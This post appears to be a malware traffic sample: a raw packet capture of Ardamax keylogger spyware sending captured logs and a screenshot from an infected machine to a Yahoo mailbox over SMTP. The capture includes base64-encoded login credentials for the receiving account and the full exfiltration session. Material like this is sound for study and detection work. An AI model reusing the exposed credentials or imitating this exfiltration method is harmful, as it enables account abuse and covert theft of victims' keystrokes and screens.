Ardamax Keylogger Key Stroke Logger Spyware Software PCAP Malware Traffic Sample

June 20, 2015

2013-02-03 18:21:34.765332 IP 172.16.253.129.53 > 8.8.8.8.53: 27825+ A? smtp.mail.yahoo.com. (37)
E..A……………..5.5.-..l…………smtp.mail.yahoo.com…..
2013-02-03 18:21:34.765388 IP 172.16.253.129.53 > 4.2.2.2.53: 27825+ A? smtp.mail.yahoo.com. (37)
E..A. ……………5.5.-..l…………smtp.mail.yahoo.com…..
2013-02-03 18:21:34.787972 IP 4.2.2.2.53 > 172.16.253.129.53: 27825 5/0/0 CNAME smtp.mail.global.gm0.yahoodns.net., CNAME smtp.mail.us.am0.yahoodns.net., A 63.250.193.228, A 98.138.105.21, A 98.139.211.125 (163)
E…R…..8……….5.5….l…………smtp.mail.yahoo.com…………….#.smtp.mail.global.gm0.yahoodns.net..1………..smtp.mail.us.am0.F.`……….?….`……….b.i..`……….b..}
2013-02-03 18:21:34.812374 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [S], seq 751532671, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.”@…O5….?……K,.z…..p…/………..
2013-02-03 18:21:34.901013 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [S.], seq 1778504586, ack 751532672, win 64240, options [mss 1460], length 0
E..,R…..<.?……..K..j…,.z.`………….
2013-02-03 18:21:34.901083 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [.], ack 1, win 64240, length 0
E..(.#@…O<….?……K,.z.j…P….<..
2013-02-03 18:21:34.988497 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 1:38, ack 1, win 64240, length 37
E..MR…..<.?……..K..j…,.z.P…|…220 smtp.mail.yahoo.com ESMTP ready

2013-02-03 18:21:34.988524 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 1:14, ack 38, win 64203, length 13
E..5.$@…O…..?……K,.z.j…P…|…EHLO DELLXT

2013-02-03 18:21:34.989514 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 14, win 64240, length 0
E..(R…..<.?……..K..j…,.z.P….
……..
2013-02-03 18:21:35.076405 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 38:145, ack 14, win 64240, length 107
E…R…..<_?……..K..j…,.z.P…….250-smtp.mail.yahoo.com
250-PIPELINING
250-SIZE 41697280
250-8 BITMIME
250 AUTH PLAIN LOGIN XYMCOOKIE

2013-02-03 18:21:35.076522 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 14:26, ack 145, win 64096, length 12
E..4.%@…O…..?……K,.z.j…P..`….AUTH LOGIN

2013-02-03 18:21:35.076786 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 26, win 64240, length 0
E..(R…..<.?……..K..j…,.z.P………….
2013-02-03 18:21:35.163894 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 145:163, ack 26, win 64240, length 18
E..:R…..<.?……..K..j…,.z.P…….334 VXNlcm5hbWU6

2013-02-03 18:21:35.164705 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 26:56, ack 163, win 64078, length 30
E..F.&@…O…..?……K,.z.j..-P..NZ…bGludXgwNjQwMEB5YWhvby5jb20=

2013-02-03 18:21:35.165967 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 56, win 64240, length 0
E..(R…..<.?……..K..j..-,.z.P….c……..
2013-02-03 18:21:35.251764 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 163:181, ack 56, win 64240, length 18
E..:R…..<.?……..K..j..-,.z.P…….334 UGFzc3dvcmQ6

2013-02-03 18:21:35.251896 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 56:70, ack 181, win 64060, length 14
E..6.’@…O*….?……K,.z.j..?P..<….YXplcnR5LzA2

2013-02-03 18:21:35.252053 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 70, win 64240, length 0
E..(R…..<.?……..K..j..?,.z.P….C……..
2013-02-03 18:21:35.578649 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 181:195, ack 70, win 64240, length 14
E..6R…..<.?……..K..j..?,.z.P…….235 2.0.0 OK

2013-02-03 18:21:35.578775 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 70:105, ack 195, win 64046, length 35
E..K.(@…O…..?……K,.z.j..MP…….MAIL FROM: <linux06400@yahoo.com>

2013-02-03 18:21:35.578955 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 105, win 64240, length 0
E..(R…..<.?……..K..j..M,.z.P………….
2013-02-03 18:21:35.667756 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 195:215, ack 105, win 64240, length 20
E..<R…..<.?……..K..j..M,.z.P…s ..250 OK , completed

2013-02-03 18:21:35.667874 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 105:138, ack 215, win 64026, length 33
E..I.)@…O…..?……K,.z.j..aP…:…RCPT TO: <linux06400@yahoo.com>

2013-02-03 18:21:35.668021 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 138, win 64240, length 0
E..(R…..<.?……..K..j..a,.{ P………….
2013-02-03 18:21:35.754885 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 215:235, ack 138, win 64240, length 20
E..<R…..<.?……..K..j..a,.{ P…r…250 OK , completed

2013-02-03 18:21:35.754988 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 138:144, ack 235, win 64006, length 6
E….*@…O/….?……K,.{ j..uP…x…DATA

2013-02-03 18:21:35.755090 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [.], ack 144, win 64240, length 0
E..(R…..<.?……..K..j..u,.{.P………….
2013-02-03 18:21:35.843198 IP 63.250.193.228.587 > 172.16.253.129.1043: Flags [P.], seq 235:271, ack 144, win 64240, length 36
E..LR…..<.?……..K..j..u,.{.P…….354 Start Mail. End with CRLF.CRLF
2013-02-03 18:21:38.775967 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 144:1168, ack 271, win 63970, length 1024
E..(.,@…K3….?……K,.{.j…P…….From: <linux06400@yahoo.com>
To: <linux06400@yahoo.com>
Subject: Logs from "Laura"
Date: Thu, 6 Jun 2013 9:46:41 -0400
Importance: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2527
X-MSMail-Priority: Normal
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="------------------=000EE933"

This is a multipart message in MIME format

--------------------=000EE933
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

You will find log file attached to this letter.
--------------------=000EE933
Content-Type: image/jpeg;
name="Jun_06_2013__09_46_12.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="Jun_06_2013__09_46_12.jpg"

/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsK
CwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQU
FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAN6BKQDASIA
AhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/
2013-02-03 18:21:38.776070 IP 172.16.253.129.1043 > 63.250.193.228.587: Flags [P.], seq 1168:2628, ack 271, win 63970, length 1460
E….-@…I~….?……K,…j…P…….8QAtRAAAgEDAwIEAwUFBAQA